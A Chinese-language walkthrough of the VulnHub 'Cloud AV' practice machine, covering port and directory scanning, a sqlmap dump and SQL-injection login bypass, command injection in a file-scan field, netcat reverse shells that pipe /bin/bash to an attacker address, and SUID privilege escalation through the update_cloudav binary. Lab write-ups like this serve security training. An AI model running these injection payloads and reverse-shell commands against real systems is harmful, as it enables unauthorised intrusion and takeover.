靶机信息
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
渗透步骤
主机服务扫描
- arp-scan -l
- nmap -p- 192.168.0.101
- nmap -p8080 -sV 192.168.0.101
#8080运行web服务
PORT STATE SERVICE VERSION
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
MAC Address: 08:00:27:FA:B2:D0 (Oracle VirtualBox virtual NIC)
web渗透
- 访问http://192.168.0.101:8080/,扫描发现三个目录,两个post接口,一个get接口
┌──(root💀kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.101:8080
[05:47:20] Starting:
[05:47:28] 200 - 2KB - /console
[05:47:35] 405 - 178B - /login
[05:47:36] 405 - 178B - /output
-
进行sql注入,发现输入双引号 " 后程序会报错
image.png - sqlmap扫描,有一张password表,有4条记录
└─# sqlmap -u "http://192.168.1.48:8080/login" --data "password=1" --level 3 --risk 3 -T code -C password --dump
+--------------------+
| password |
+--------------------+
| myinvitecode123 |
| mysecondinvitecode |
| cloudavtech |
| mostsecurescanner |
+--------------------+
-
使用密码登录即可,或使用万能钥匙 " or 1=1 --
image.png
命令注入
- 输入框中输入文件名,即可扫描,发现可能存在命令执行漏洞;
-
命令执行 hello1 | ls ,显示可执行命令
image.png
使用nc反弹shell
通用做法:
- 在攻击主机上执行端口监听nc -lvvp port
- 在目标主机上执行:nc -e /bin/bash 攻击主机ip port
但是nc版本原因,部分情况下 -e参数不能使用;
- 在攻击主机上打开两个终端,分别监听 1234 和 4321 端口
- nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321
- 得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果
suid提权
-
检查目录下存在可执行文件 update_cloudav,同级目录下有.c文件,考虑为c语言源码。
image.png -
同时检查update_cloudav.c文件内容,存在执行命令语句。
image.png - 在主机开启6666、7777端口,执行命令 ./update_cloudav "a| nc 192.168.0.104 6666 | /bin/bash | nc 192.168.0.104 7777"
image.png
知识点总结
- nc反弹shell
https://blog.csdn.net/qiuyeyijian/article/details/102993592#0x02_ncnetcat_33 - suid提权 https://blog.csdn.net/shuteer_xu/article/details/104912790
- 命令注入 | || & && 的区别
